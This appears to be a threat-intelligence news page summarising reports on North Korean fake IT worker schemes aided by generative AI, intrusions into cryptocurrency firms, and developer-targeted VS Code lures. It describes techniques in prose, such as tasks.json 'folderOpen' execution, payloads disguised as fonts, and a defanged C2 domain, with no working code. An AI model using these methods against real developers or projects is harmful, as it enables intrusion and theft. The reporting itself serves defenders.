North Korean Threat Actors Use AI-Enabled IT Worker Scams and Target Crypto Firms
Microsoft-linked reporting says North Korean threat actors are using AI to scale and refine long-running “fake IT worker” schemes, where operatives pose as legitimate remote hires to obtain authorized access inside victim organizations. The activity is attributed to DPRK-linked clusters Jasper Sleet and Coral Sleet, with AI used to improve identity fabrication and maintenance (including face/voice manipulation) and to sustain day-to-day communications that help keep fraudulent personas credible, enabling “sustained, large-scale misuse of legitimate access.”
Separately, reporting on suspected DPRK-linked intrusions describes a coordinated campaign against cryptocurrency organizations spanning staking platforms, exchange software providers, and exchanges, with theft of source code, private keys, and cloud secrets. Investigators described two primary access paths: exploitation of CVE-2025-55182 in the React2Shell framework (including mass scanning and WAF-bypass techniques) and the use of pre-obtained valid AWS access tokens to move directly into cloud enumeration; researchers also recovered artifacts from attacker infrastructure (e.g., shell history, archived code, and tool configurations) that provided visibility into post-compromise activity and C2 setup.
Related Entities
Vulnerabilities
Threat Actors
Sources
Related Stories
Microsoft Warns Threat Actors Are Using Generative AI to Scale Cyberattacks and North Korean Fake Worker Schemes
Microsoft Threat Intelligence reported that threat actors are increasingly using **generative AI** as a “force multiplier” across the cyberattack lifecycle—speeding up reconnaissance, phishing and social engineering, infrastructure setup, malware development/debugging, and post-compromise tasks such as summarizing stolen data and assisting with scripting. The report emphasizes that most observed malicious AI use today centers on language models for producing text, code, and media, reducing technical friction while human operators retain control over targeting and execution. Microsoft highlighted **North Korean** activity as a prominent example, stating that groups it tracks as **Jasper Sleet (Storm-0287)**, **Coral Sleet (Storm-1877)**, and **Sapphire Sleet** are using AI to scale “fake remote worker” operations by rapidly generating realistic personas (names, resumes, communications) tailored to specific job markets and roles. Reported tactics include researching job postings (e.g., on Upwork) to align fabricated profiles with in-demand skills, using AI-generated multilingual lures that mimic internal corporate communications, and employing AI-enabled media manipulation such as **Faceswap** to insert operatives’ faces into stolen identity documents, alongside AI-driven impersonation and real-time voice modulation to improve social engineering and access persistence.
1 weeks ago
North Korean Contagious Interview Campaign Uses Malicious VS Code Projects
North Korea-linked threat actors tied to the long-running **Contagious Interview** operation have been observed using **malicious Microsoft Visual Studio Code (VS Code) projects** as part of fake job-assessment lures, instructing targets to clone repositories from GitHub/GitLab/Bitbucket and open them in VS Code. The technique abuses VS Code `tasks.json` configuration—specifically `"runOn": "folderOpen"`—to trigger execution when a folder is opened, pulling staged payloads from attacker-controlled infrastructure (including Vercel-hosted domains) and ultimately deploying backdoors such as **BeaverTail** and **InvisibleFerret** that enable remote code execution and follow-on control. Recent iterations reportedly add multi-stage droppers embedded in task configuration content and disguised as benign files (e.g., spell-check dictionaries) to improve resilience if network retrieval fails, and include command-and-control behavior that can execute attacker-supplied JavaScript from a remote server (e.g., `ip-regions-check.vercel[.]app`). Separate reporting on North Korean APT trends indicates continued reliance on **fraudulent IT employment schemes** and recruitment-platform abuse to gain access to Western organizations, including long-term social engineering and persistent remote access via legitimate tools (e.g., *AnyDesk*, *Google Remote Desktop*) and VPN/location obfuscation. This broader pattern aligns with the same overarching tradecraft used in developer-targeted “interview” lures: leveraging hiring workflows and developer tooling to establish initial access and persistence while reducing suspicion, particularly in environments with remote-work infrastructure and developer workstations.
1 months ago
North Korea-linked Social Engineering Campaigns Targeting Developers and Defense Supply Chains
North Korea–aligned operators, including **Lazarus** (aka **HIDDEN COBRA**), are running multiple social-engineering-led intrusion campaigns aimed at stealing sensitive technology and establishing durable access. Reporting on **Operation DreamJob** describes fake job-offer lures used to compromise European drone manufacturers and defense contractors, with tooling and infrastructure designed to evade traditional defenses and support cyber-espionage against UAV-related intellectual property. Separately, a developer-focused operation dubbed **“Fake Font”** uses fake recruiter outreach and malicious GitHub repositories to trick engineers into opening projects that abuse *Visual Studio Code* automation (via `.vscode/tasks.json`) and disguised payloads (e.g., `.woff2` “font” files) to execute multi-stage malware that ultimately deploys the **InvisibleFerret** Python backdoor for credential and crypto-wallet theft and long-term access. A distinct DPRK-linked campaign reported by Darktrace targets South Korean users with spear-phishing that delivers a JSE script masquerading as an HWPX document and then abuses **VS Code tunnels** as a covert C2 channel over trusted Microsoft infrastructure, complicating detection in developer-heavy environments. Other items in the set describe unrelated activity: phishing abuse of *Vercel* to deliver remote-access tooling, exploitation of **CVE-2025-51683** (blind SQLi) in the *Mjobtime* time-tracking app to reach MSSQL `xp_cmdshell`, a hospitality-focused **DCRat** campaign using **ClickFix** and `MSBuild.exe`, a generic CSS exfiltration technique write-up, and Trend Micro research on the **PeckBirdy** LOLBins framework used by China-aligned intrusion sets—none of which are part of the DPRK developer/defense recruitment-themed operations above.
1 months ago